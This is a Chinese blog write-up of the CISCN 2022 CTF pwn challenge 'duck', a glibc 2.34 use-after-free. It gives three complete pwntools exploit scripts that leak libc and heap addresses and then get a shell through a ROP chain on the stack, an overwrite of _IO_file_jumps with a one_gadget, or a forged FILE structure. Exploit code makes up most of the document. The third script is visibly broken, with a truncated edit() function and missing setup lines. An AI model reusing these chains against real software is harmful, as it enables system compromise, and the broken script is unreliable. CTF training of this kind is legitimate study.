ciscn 2022 华东北分区赛pwn duck

已于 2022-07-04 13:54:07 修改
阅读量1k 收藏 6
点赞数 6
分类专栏: wp 文章标签: ubuntu linux 服务器 pwn
于 2022-06-30 18:24:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/125545128
版权

ciscn 2022 华东北分区赛pwn duck

很遗憾的是当时比赛解出此题花了很长时间(换了m1的mac 环境还没装,到了比赛前一会想起来x86_64的题目肯定会多一些,所以就拿了一个全新版win10的tp,第一次体验到了在比赛的时候下载ubuntu,装vm和pwn的环境,导致浪费了很多时间。。。。)
这个pwn是2.34下的,一开始拿到这个题目的时候吓了一跳(当时是第二次做2.34的glibc pwn),以为要像house of emma那样,分析下来之后感谢出题人高抬贵手。
一个uaf漏洞,但是是2.34下的,2.34下禁用了free_hook, malloc_hook这两个做堆题需要用到最多的hook
在这里插入图片描述
当时做题的时候上网搜了一下2.34的利用手法,总结出了两个方法,一个是借助environ算出ret的地址然后去覆盖,另一个是io利用。
这里给出3种不同的exp及利用思路

第一种攻击方法 借助environ修改edit返回地址为rop链

第一种借助environ来覆盖ret。
在2.33的时候fd会有异域加密,想要更改fd进行任意地址申请的话需要泄露出heap地址,这一题因为有uaf所以很好泄露,也很容易泄露出libc,填充满tcache即可。
留两个tcache bins,借助edit来修改fd达成任意地址申请,需要申请到environ这个地址,因为这里存放着stack地址,泄露出来之后算出edit的返回地址即可。
在这里插入图片描述
再次利用uaf申请到edit的返回地址之后修改0x000056123dd9b631为rop链即可getshell

from pwn import *
from time import sleep

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('192.168.166.139', 58013)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Choice: '

def add():
    r.sendlineafter(menu, '1')

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Idx:', str(index))

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Idx:', str(index))

def edit(index, size, content):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Idx:', str(index))
    r.sendlineafter('Size:', str(size))
    r.sendafter('Content:', content)

for i in range(9):
    add()

for i in range(8):
    delete(i)

show(7)
libc_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96
li('libc_addr = ' + hex(libc_addr))
show(0)
r.recvuntil('\n')
key = u64(r.recv(5).ljust(8, b'\x00'))
heap_base = key << 12
li('heap_base = ' + hex(heap_base))

libc = ELF('./libc.so.6')
libc_base = libc_addr - libc.sym['main_arena']
li('libc_base = ' + hex(libc_base))
environ = libc_base + libc.sym['environ']
li('environ = ' + hex(environ))

for i in range(5):
    add() # 9 - 13

p1 = p64(key ^ environ) + p64(0)
edit(1, 0x10, p1)

add()   #14
add()   #15
show(15)
stack_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x168
li('stack_addr = ' + hex(stack_addr))

delete(9)
delete(10)
edit(10, 0x10, p64(key ^ stack_addr) + p64(0))
add() #16
add()   #17
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
system_addr = libc_base + libc.sym['system']
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()

p2 = p64(0) * 3 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)
edit(17, 0x30, p2)

r.interactive()

第二种攻击方法 修改_IO_file_jumps中的_IO_new_file_overflow

第二种借助puts时会调用_IO_new_file_overflow刷新缓冲区
在这里插入图片描述
这种是笔者认为解这题最简单的方法,直接利用uaf申请到_IO_file_jumps这里修改_IO_new_file_overflow为one_gadget即可getshell

from pwn import *
from time import sleep

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('192.168.166.139', 58013)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Choice: '

def add():
    r.sendlineafter(menu, '1')

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Idx:', str(index))

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Idx:', str(index))

def edit(index, size, content):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Idx:', str(index))
    r.sendlineafter('Size:', str(size))
    r.sendafter('Content:', content)

for i in range(9):
    add()

for i in range(8):
    delete(i)

show(7)
libc_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96
li('libc_addr = ' + hex(libc_addr))
show(0)
r.recvuntil('\n')
key = u64(r.recv(5).ljust(8, b'\x00'))
heap_base = key << 12
li('heap_base = ' + hex(heap_base))

libc = ELF('./libc.so.6')
libc_base = libc_addr - libc.sym['main_arena']
li('libc_base = ' + hex(libc_base))
_IO_file_jumps = libc_base + libc.sym['_IO_file_jumps']
li('_IO_file_jumps = ' + hex(_IO_file_jumps))

for i in range(5):
    add() #9 - 13

p1 = p64(key ^ _IO_file_jumps) + p64(0)
edit(1, 0x10, p1)

add() #14
add() #15

one = [0xda861, 0xda864, 0xda867]
one_gadget = one[1] + libc_base
edit(15, 0x20, p64(0) * 3 + p64(one_gadget))

r.interactive()

第三种攻击方法 伪造io结构体

这种攻击方法笔者认为是最麻烦的,和house of orange很像,把/bin/sh放到头,执行vtable的函数时,FILE结构体地址被作为参数来getshell
劫持_IO_new_file_xsputn这个函数。当然了修改_IO_new_file_overflow这个也是可以的,就是利用puts这个函数。
在这里插入图片描述
在这里插入图片描述

from pwn import *
from time import sleep

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('192.168.166.139', 58013)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Choice: '

def add():
    r.sendlineafter(menu, '1')

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Idx:', str(index))

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Idx:', str(index))

def edit(index, size, content):
    r.sendlineafter(menu, '4')

add() #10
add() #11
for i in range(7):
    delete(i) # 0 - 6

delete(7)
show(7)
libc_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96
li('libc_addr = ' + hex(libc_addr))
show(0)
r.recvuntil('\n')
key = u64(r.recv(5).ljust(8, b'\x00'))
heap_base = key << 12
li('heap_base = ' + hex(heap_base))

libc = ELF('./libc.so.6')
libc_base = libc_addr - libc.sym['main_arena']
li('libc_base = ' + hex(libc_base))

system_addr = libc_base + libc.sym['system']
stdout = libc_base + libc.sym['_IO_2_1_stdout_']
li('stdout = ' + hex(stdout))
IO_file_jumps = libc_base + libc.sym['_IO_file_jumps']

target = key ^ IO_file_jumps
li('target = ' + hex(target))
edit(6, 0x100, p64(target))
add()   #12
add()   #13
fake = p64(0) + p64(0)
fake += p64(libc_base + 0x83d80) + p64(libc_base + 0x84750)
fake += p64(libc_base + 0x84440) + p64(libc_base + 0x85520)
fake += p64(libc_base + 0x86600) + p64(system_addr)

delete(8)
edit(8, 0x8, p64(key ^ stdout))
add()
add()
edit(15, 0x10, b'/bin/sh\x00')
#edit(13, 0x40, fake)
r.sendlineafter(menu, '4')
sleep(1)
r.sendline('13')
sleep(1)
#r.sendline('0x40')
r.sendline('64')
sleep(1)
r.sendline(fake)

r.interactive()

另外两道pwn后面再更新,第二个bigduck最简单的就是environ这个方法只不过后面的rop链变成了orw。

z1r0.
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2022CISCN部分wp misc pwn
qq_42951211的博客
06-03 801
2022CISCN部分wp
2022 CISCNpwn完整wp
weixin_46483787的博客
06-09 2146
2022 CISCNpwn的完整wp
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
ciscn的简介
weixin_33840661的博客
03-31 1105
www.ciscn.cn 全国大学生信息安全竞官网教育部按照《教育部关于进一步加强信息安全学科、专业建设和人才培养工作的意见》(教高〔2005〕7号)的要求及《教育部关于成立2006-2010年教育部高等学校有关科类教学指导委员会的通知》(教高函〔2005〕25号)的有关工作安排,为加强教育部对高等学校信息安全人才培养工作的宏观指导与管理,充分发挥专家学者对信息安全...
CISCN(Web Ezpentest)GC、序列化、case when
qq_62046696的博客
02-17 638
最近又学到了一道新知识,case when的错误注入,也是盲注的一种。结果返回 NULL解释一下这个就可以理解,也就是首先二进制(B),然后when后面其实就是判断,如果判断成功执行 then都没有则会返回NULL单纯看的话,这段代码基本就是sql注入的后端,id后面的东西是需要我们注入的,REGEXP后面是是否以f开头,重点是这里如果不成立则会 1+~0(这里为取反操作符,0 取反即为最大值,再加 1 溢出报错)
ciscn 2022 东北分区pwn bigduck
z1r0的博客
07-01 693
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
[CISCN2022] Duck-Wp
m0_46329041的博客
07-10 277
该题目附件我已经上传到Github,有需要的可以下载,复现这题时,我是使用的NSSCTF提供的远程环境。此题是一道libc2.34的题,libc2.34与2.33最大的不同就是移除了以往常用的malloc_hook,free_hook等hook函数,导致利用上较为困难,2.34与2.33一样,chunk的fd指针都采用了异或加密,在申请chunk时便会异或解密,所以当我们改写fd指针时,只需要将泄露出的堆的基地址右移12位后与当前地址异或即可。glibc中采用的异或加密的规则并不难:将堆的基地址右移12位后
2022CISCN东北复现
qq_52988816的博客
08-04 694
stegsolve查看发现lsb隐写,红蓝绿通道有加密字符串,这里用seteg一把梭应该也可以感觉像base64,解码pi ka chu解码。
ciscn 2022 pwn-newest_note复现
qq_34010404的博客
06-01 647
刚开始有个溢出(太菜了,其他师傅提醒才看出来) del 函数里面 free之后指针没有清0 攻击思路: 如果elf里面使用了stdout,等,那么IO函数里面取到的stdout就是bss段上的stdout,否则就是libc里面的stdout。IO函数位于libc里面,libc里面有一处地方可以泄露elf基址(这段区域是只读的) 考虑alloc到heap数组上,然后修改成员为图中的地址,这样就可以leak elf的地址了(leak之后是为了后面修改free count做准备)。前提是得先leak lib
ciscn 2022 东北分区pwn blue
z1r0的博客
07-02 736
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
A pwn challenge in 2022 美团高校 .zip
11-09
资源,竞解决方案,包含完整源码解决方案内容,可用于参学习、参考 美资源,竞解决方案,包含完整源码解决方案内容,可用于参学习、参考 美资源,竞解决方案,包含完整源码解决方案...
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
强网杯2022 pwn 题解析.docx
12-18
强网杯
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
三种方式搞定buuctf之ciscn_2019_n_1
最新发布
weixin_54452942的博客
03-26 571
三种方法解ciscn_2019_n_1,简单易懂,走过路过不要错过
2023CISCN区—pwn wp
m0_63437215的博客
07-13 1052
ciscn2023pwn
CISCN2022】东北pwn
weixin_51055545的博客
06-20 323
题目附件大家自取例行检查:amd架构的保护机制全开,放到ida分析;ida分析:首先是开了一个沙箱:这里我用的我的ubuntu16检测的,因为我的21没安装这个工具:然后就是一个菜单:功能齐全;漏洞点在del函数中,释放堆块后未将链表中的指针清空,存在uaf漏洞;漏洞利用:uaf泄露出地址,可以算出environ环境变量在libc中的地址,根据environ环境变量的特性(指向一个栈地址),从而得到栈地址,算出具体偏移,得到ret地址,在通过uaf将堆块申请到返回地址上,写orw读出flagexp: 拿到f
CISCN分区东北部分wp
Htt9999的博客
06-27 686
东北分区部分wp
2022 CISCN全国初-wp
qq_45603443的博客
05-30 1763
2022 CISCN全国初-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
docker pwn
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行设置: 1. 克隆pwndocker仓库: ```shell git clone https://github.com/Green-Avocado/pwndocker.git ``` 2. 进入pwndocker目录: ```shell cd pwndocker ``` 3. 运行setup.sh脚本(请勿使用超级用户身份运行): ```shell sudo ./setup.sh ``` 完成上述步骤后,您将获得一个已配置好的Docker容器,其中包含了一些常用的CTF工具和调试器,例如pwndbg。 如果您想要在Docker容器中实现命令和输出分别在两个终端窗口的效果,可以按照以下步骤进行设置: 1. 将您的终端分成两块(例如,在Mac上使用⌘ + d进行垂直分屏)。 2. 在第一个终端中,使用tty命令查看当前终端用于显示连接到当前标准输入的终端设备文件名。通常情况下,第一个终端的设备文件名为/dev/pts/0。 3. 在第一个终端中,编辑pwndbg的配置文件(通常位于~/.gdbinit)。 4. 在配置文件中添加以下内容,并将/dev/pts/1替换为第二个终端的设备文件名: ```shell set context-output /dev/pts/1 ``` 5. 保存并退出配置文件。 完成上述步骤后,您将能够在第一个终端中输入命令,并在第二个终端中查看输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值